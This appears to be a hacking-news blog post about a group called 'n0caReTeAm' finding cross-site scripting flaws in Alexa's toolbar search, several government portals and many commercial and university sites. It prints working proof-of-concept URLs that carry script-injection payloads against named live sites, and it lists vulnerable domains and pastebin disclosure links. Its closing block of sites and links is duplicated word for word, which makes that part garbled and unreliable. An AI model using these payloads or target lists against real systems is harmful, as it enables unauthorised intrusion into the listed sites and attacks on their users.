A hacker named as kuksool from the hacker group "n0careteam" has discovered a Cross Site scripting vulnerability in the Alexa website -A California-based subsidiary company of Amazon.com that provides infromation about websites including Internet traffic stats, rank.
The vulnerability exists in the Alexa Toolbar search page(search.toolbars.alexa.com) - A custom search provided by Google.
If you have installed the toolbar in your browser & inject this script in the search box, it successfully executes the given script:
"><script>alert(" E Hacking News")</script>
 |
| Xss in Alexa Toolbar Search |
POC:
http://search.toolbars.alexa.com/?q="><script>alert("+E+Hacking+News")</script>Recently the same hacker group discovered XSS vulnerability in high profile websites including Russian and Malaysia Government sites, Music.com, New York Magazine.
Hacker Team called "n0caReTeAm" discovered Cross site Scripting Vulnerability in lot of high profile sites and Government sites including music.com, SecurityXploded.com. (SecurityXploded is a popular Infosec Research & Development portal.)
Music.com,techspot.com, games.com and some other High profile sites are vulnerable to XSS. Hackers also found XSS Vulnerabilities in South Africa, US, Nigeria ,France government sites.
Hackers exposed the Vulnerability in pastebin:
http://pastebin.com/QtG79hcw
http://pastebin.com/fbUjMccb
The Poc for SecurityXploded is here:
http://securityxploded.com/download-ebook.php?download_ url=http://goo.gl/Uvk6N& bookid=9278104617&hash_tag= 5adcb2d1488ecbb2e7c3af3a92c285 ca5984bc21&b_data= aHR0cDovL3d3dy40c2hhcmVkLmNvbS 9vZmZpY2UvSHZ1UTZhZGkvWFNTX0F0 dGFja3NfLV9Dcm9zc19TaXRlX1Njcm lwLmh0bQ==&b_title=%22%3E% 3Cscript%3Ealert%28String. fromCharCode%28110,%2048,% 2099,%2097,%2082,%20101,%2084, %20101,%2065,%20109,%2032,% 2088,%20115,%20115%29%29%3C/ script%3E
Two Russian sites(Russia's electronic system for public tendering, The Ministery of the Russian Federation) and one Malaysia site(Malysia Merchandise External Trade Statistics System) are notified as vulnerable to Cross site scripting.
Vulnerable sites:
- www.mchs.gov.ru
- zakupki.gov.ru
- intranet.stats.gov.my
They exposed the Vulnerability in Pastebin:
http://pastebin.com/y6HL6FFv
Poc:
http://nymag.com/search/search.cgi?fd=All&Ns=Relevance|0&search_type=sw&N=0&textquery=%22%3E%3Cscript%3Ealert%28String.fromCharCode%28110%2C+48%2C+99%2C+97%2C+82%2C+101%2C+84%2C+101%2C+65%2C+109%2C+32%2C+88%2C+115%2C+115%29%29%3C%2Fscript%3E&x=18&y=16&scope=sc-all
http://www.openwebdesign.org/viewdesign.phtml?id=6216&referer=%2Fbrowse.php%22%3E%3Cscript%3Ealert%28String.fromCharCode%28110,%2048,%2099,%2097,%2082,%20101,%2084,%20101,%2065,%20109,%2032,%2088,%20115,%20115%29%29%3C/script%3E
http://www.programmersheaven.com/search/results/?cx=partner-pub-8629231900604628%3Ayi7bwia17xq&cof=FORID%3A10&ie=ISO-8859-1&as_q=%22%3E%3Cscript%3Ealert%28String.fromCharCode%28110%2C+48%2C+99%2C+97%2C+82%2C+101%2C+84%2C+101%2C+65%2C+109%2C+32%2C+88%2C+115%2C+115%29%29%3C%2Fscript%3E&sa=Search
The hacker group "n0caReTeAm" have found a cross site scripting vulnerability in high profile sites including photobucket
,depositefiles and some other sites.
Here is the list of Vulnerable sites:
photobucket.com
depositfiles.com
mirc.net
www.greenseekers.com.au
www.download-web.org
alaska.edu
wisdomjobs.com
www.employmentguide.com
www.safaricomputers.com
www.mnscu.edu
www.boatshop24.co.uk
www.humanevents.com
www.archive.org
salesgroupclosers.com
events.msu.edu
Hackers exposed the vulnerability in pastebin:
http://pastebin.com/nCLvSxvy
http://pastebin.com/078q9KFr
http://pastebin.com/vbERLP8f
,depositefiles and some other sites.
Here is the list of Vulnerable sites:
photobucket.com
depositfiles.com
mirc.net
www.greenseekers.com.au
www.download-web.org
alaska.edu
wisdomjobs.com
www.employmentguide.com
www.safaricomputers.com
www.mnscu.edu
www.boatshop24.co.uk
www.humanevents.com
www.archive.org
salesgroupclosers.com
events.msu.edu
Hackers exposed the vulnerability in pastebin:
http://pastebin.com/nCLvSxvy
http://pastebin.com/078q9KFr
http://pastebin.com/vbERLP8f
